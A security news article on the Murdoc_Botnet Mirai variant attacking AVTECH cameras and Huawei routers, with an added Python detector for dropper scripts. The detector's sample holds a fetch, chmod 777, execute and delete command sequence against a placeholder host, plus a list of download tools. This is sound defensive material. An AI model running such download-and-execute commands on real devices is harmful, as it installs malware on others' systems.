New Mirai Malware Variant Targets AVTECH Cameras, Huawei Routers

A significant botnet campaign leveraging a new variant of the infamous Mirai malware, dubbed Murdoc_Botnet, has been observed targeting AVTECH cameras and Huawei HG532 routers, exploiting known vulnerabilities to infect devices and establish a vast network for malicious activities.

Identified by researchers at Qualys, the Murdoc_Botnet campaign uses exploits such as CVE-2024-7029 and CVE-2017-17215 to breach devices and deploy payloads.

Once compromised, devices are enrolled in the botnet and are capable of executing large-scale distributed denial-of-service (DDoS) attacks. 

“[This variant] demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks,” Qualys explained.

The security analysts traced the campaign back to July 2024, identifying over 1300 active IPs involved in its propagation.

How the Malware Spreads

The malware uses shell scripts and ELF binaries to infiltrate systems. Attackers initiate infections by exploiting device vulnerabilities to download and execute payloads. These scripts fetch malware files, grant them execution rights and remove traces of the installation process.

Qualys examined more than 500 samples, revealing consistent infection mechanisms and targets, primarily IoT devices like IP cameras and network routers.

Global Reach and Detection

The campaign has had a significant impact in Malaysia, Thailand, Mexico and Indonesia.

Qualys reported more than 100 command-and-control servers coordinating the botnet’s activities. The company’s Endpoint Detection and Response (EDR) solution has successfully identified multiple instances of this malware.

To mitigate risks, Qualys advised:

  • Monitoring unusual processes and network activities from untrusted sources

  • Avoiding the execution of unknown shell scripts

  • Keeping devices updated with the latest firmware and security patches
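
As an added example (not code from Qualys or from the original article), the Python check below triages a shell script before anyone runs it, flagging the fetch, grant-execute, run, delete sequence described under "How the Malware Spreads". The tool list, the function names and the sample script are assumptions constructed for illustration.

```python
import re
from posixpath import basename
FETCHERS = {"wget", "curl", "tftp", "ftpget"}  # assumed set of download tools
SHELLS = {"sh", "bash", "ash"}
# Constructed sample script (documentation IP, made-up file name), not a real IoC.
SAMPLE = """#!/bin/sh
wget http://192.0.2.10/sample.arm -O sample.arm
chmod 777 sample.arm; ./sample.arm
rm -rf sample.arm
"""

def split_commands(script):
    """Yield an argv list per simple command (split on newline ; && || |)."""
    for chunk in re.split(r"\n|;|&&|\|\||\|", script):
        if chunk.strip() and not chunk.strip().startswith("#"):
            yield chunk.split()  # whitespace split is enough for triage

def exec_mode(mode):
    """True if a chmod mode (octal or symbolic) sets an execute bit."""
    octal = re.fullmatch(r"[0-7]{3,4}", mode)
    return any(int(d) & 1 for d in mode[-3:]) if octal else "+" in mode and "x" in mode

def dropper_stages(script):
    """Return {file name: [stages in the order seen]} for every fetched file."""
    seen = {}
    for argv in split_commands(script):
        cmd, args = basename(argv[0]), argv[1:]
        names = {basename(a) for a in args if not a.startswith("-")}
        if cmd in FETCHERS:
            out = [args[i + 1] for i, a in enumerate(args[:-1]) if a in ("-O", "-o")]
            for target in out or [a for a in args if "://" in a]:  # else URL basename
                seen.setdefault(basename(target), ["fetch"])
            continue
        if cmd == "chmod" and args and exec_mode(args[0]):
            stage, hits = "chmod", names
        elif cmd == "rm":
            stage, hits = "rm", names
        else:  # "sh file" and "./file" both count as execution
            stage, hits = "exec", names if cmd in SHELLS else {cmd}
        for name in hits & set(seen):
            if stage not in seen[name]:
                seen[name].append(stage)
    return seen

def is_dropper(stages):
    """Flag fetch -> chmod -> execute in that order; a later 'rm' is trace removal."""
    return stages[:3] == ["fetch", "chmod", "exec"]

if __name__ == "__main__":
    print({n: (s, is_dropper(s)) for n, s in dropper_stages(SAMPLE).items()})
```

A script that only downloads and later deletes a file is not flagged; the check fires only when the same file is fetched, made executable and then run.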

Murdoc_Botnet represents an evolution of the Mirai malware family, demonstrating the growing sophistication of IoT-targeted cyber threats. Security professionals must remain vigilant and employ the tactics above, as well as advanced tools, to defend against these campaigns.
